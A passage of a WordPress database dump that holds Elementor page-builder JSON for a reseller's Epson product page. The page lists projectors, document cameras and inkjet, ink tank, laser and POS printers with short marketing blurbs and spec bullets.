]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8644,3661,'_edit_last','1'),(8645,3661,'_elementor_edit_mode','builder'),(7984,3484,'_elementor_version','2.5.14'),(7997,3486,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" 